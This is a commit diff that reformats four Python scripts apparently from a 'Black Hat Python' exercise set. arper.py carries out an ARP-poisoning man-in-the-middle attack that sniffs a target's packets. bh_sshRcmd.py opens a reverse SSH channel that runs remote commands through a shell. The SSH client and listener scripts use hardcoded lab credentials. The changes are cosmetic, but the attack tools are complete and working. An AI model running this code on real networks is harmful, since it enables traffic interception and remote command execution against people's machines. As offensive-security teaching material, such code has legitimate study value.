edoardottt · Dec 11, 2020
diff --git a/‎arper.py
+51-25 b/‎arper.py
+51-25
diff --git a/‎bh_sshRcmd.py
+7-5 b/‎bh_sshRcmd.py
+7-5
diff --git a/‎bh_sshcmd.py
+5-3 b/‎bh_sshcmd.py
+5-3
diff --git a/‎bh_sshserver.py
+10-9 b/‎bh_sshserver.py
+10-9
@@ -26,83 +26,109 @@
 
 print("[*] Setting up {}".format(interface))
 
+
 def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
-    
+
     # slightly different method using send
     print("[*] Restoring target...")
-    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac),count=5)
-    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac),count=5)
-    
+    send(
+        ARP(
+            op=2,
+            psrc=gateway_ip,
+            pdst=target_ip,
+            hwdst="ff:ff:ff:ff:ff:ff",
+            hwsrc=gateway_mac,
+        ),
+        count=5,
+    )
+    send(
+        ARP(
+            op=2,
+            psrc=target_ip,
+            pdst=gateway_ip,
+            hwdst="ff:ff:ff:ff:ff:ff",
+            hwsrc=target_mac,
+        ),
+        count=5,
+    )
+
     # signals the main thread to exit
     os.kill(os.getpid(), signal.SIGINT)
-    
+
+
 def get_mac(ip_address):
-    
-    responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
-    
+
+    responses, unanswered = srp(
+        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10
+    )
+
     # return the MAC address from a response
-    for s,r in responses:
+    for s, r in responses:
         return r[Ether].src
     return None
 
+
 def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
-    
+
     poison_target = ARP()
     poison_target.op = 2
     poison_target.psrc = gateway_ip
     poison_target.pdst = target_ip
     poison_target.hwdst = target_mac
-    
+
     poison_gateway = ARP()
     poison_gateway.op = 2
     poison_gateway.psrc = target_ip
     poison_gateway.pdst = gateway_ip
     poison_gateway.hwdst = gateway_mac
-    
+
     print("[*] Beginning the ARP poison. [CTRL-C to stop]")
-    
+
     while True:
         try:
             send(poison_target)
             send(poison_gateway)
-            
-            time.sleep(2)   
+
+            time.sleep(2)
         except KeyboardInterrupt:
             restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
-    
+
     print("[*] ARP poison attack finished.")
     return
 
+
 gateway_mac = get_mac(gateway_ip)
 
 if gateway_mac is None:
     print("[!!!] Failed to get gateway MAC. Exiting.")
     sys.exit(0)
 else:
-    print("[*] Gateway {} is at {} ".format(gateway_ip,gateway_mac))
+    print("[*] Gateway {} is at {} ".format(gateway_ip, gateway_mac))
 
 target_mac = get_mac(target_ip)
 
 if target_mac is None:
     print("[!!!] Failed to get target MAC. Exiting.")
     sys.exit(0)
 else:
-    print("[*] Target {} is at {}".format(target_ip,target_mac))
-    
+    print("[*] Target {} is at {}".format(target_ip, target_mac))
+
 # start poison thread
-poison_thread = threading.Thread(target = poison_target, args = (gateway_ip, gateway_mac, target_ip, target_mac))
+poison_thread = threading.Thread(
+    target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac)
+)
 poison_thread.start()
 
 try:
     print("[*] Starting sniffer for {} packets".format(packet_count))
-    
+
     bpf_filter = "ip host {}".format(target_ip)
-    
-    packets = sniff(count = packet_count, filter = bpf_filter, iface= interface)
-    
+
+    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
+
     # write out the captured packets
     restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
-    
+
 except:
     # restore the network
     restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
 
@@ -10,23 +10,25 @@
 import paramiko
 import subprocess
 
+
 def ssh_command(ip, user, passwd, command):
     client = paramiko.SSHClient()
-    #client.load_host_keys('/home/justin/.ssh/known_hosts')
+    # client.load_host_keys('/home/justin/.ssh/known_hosts')
     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
     client.connect(ip, username=user, password=passwd)
     ssh_session = client.get_transport().open_session()
     if ssh_session.active:
         ssh_session.send(command)
-        print(ssh_session.recv(1024)) # read banner
+        print(ssh_session.recv(1024))  # read banner
         while True:
-            command = ssh_session.recv(1024) # get the command from the SSH server
+            command = ssh_session.recv(1024)  # get the command from the SSH server
             try:
                 cmd_output = subprocess.check_output(command, shell=True)
                 ssh_session.send(cmd_output)
             except Exception as e:
                 ssh_session.send(str(e))
         client.close()
-    return 
+    return
+
 
-ssh_command('192.168.100.130', 'justin', 'lovesthepython', 'id')
+ssh_command("192.168.100.130", "justin", "lovesthepython", "id")
@@ -10,15 +10,17 @@
 import paramiko
 import subprocess
 
+
 def ssh_command(ip, user, passwd, command):
     client = paramiko.SSHClient()
-    #client.load_host_keys('/home/justin/.ssh/known_hosts')
+    # client.load_host_keys('/home/justin/.ssh/known_hosts')
     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
     client.connect(ip, username=user, password=passwd)
     ssh_session = client.get_transport().open_session()
     if ssh_session.active:
         ssh_session.exec_command(command)
         print(ssh_session.recv(1024))
-    return 
+    return
+
 
-ssh_command('192.168.100.131', 'justin', 'lovesthepython', 'id')
+ssh_command("192.168.100.131", "justin", "lovesthepython", "id")
@@ -12,23 +12,24 @@
 import sys
 
 # using the key from the Paramiko demo files
-host_key = paramiko.RSAKey(filename='test_rsa.key')
+host_key = paramiko.RSAKey(filename="test_rsa.key")
+
 
 class Server(paramiko.ServerInterface):
-    
     def __init__(self):
         self.event = threading.Event()
-        
+
     def check_channel_request(self, kind, chanid):
         if kind == "session":
             return paramiko.OPEN_SUCCEEDED
         return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
-    
+
     def check_auth_password(self, username, password):
         if username == "justin" and password == "lovesthepython":
             return paramiko.AUTH_SUCCESSFUL
         return paramiko.AUTH_FAILED
-    
+
+
 server = sys.argv[1]
 
 ssh_port = int(sys.argv[2])
@@ -40,7 +41,7 @@ def check_auth_password(self, username, password):
     sock.listen(100)
     print("[+] Listening for connection...")
     client, addr = sock.accept()
-    
+
 except Exception as e:
     print("[-] Listen failed: " + str(e))
     sys.exit(1)
@@ -49,17 +50,17 @@ def check_auth_password(self, username, password):
 try:
     bhSession = paramiko.Transport(client)
     bhSession.add_server_key(host_key)
-    
+
     server = Server()
     try:
-        bhSession.start_server(server = server)
+        bhSession.start_server(server=server)
     except paramiko.SSHException as x:
         print("[-] Negotiation failed.")
     chan = bhSession.accept(20)
     print("[+] Authenticated!")
     print(chan.recv(1024))
     chan.send("Welcome to bh_ssh!")
-    
+
     while True:
         try:
             command = input("Enter command: ").strip("\n")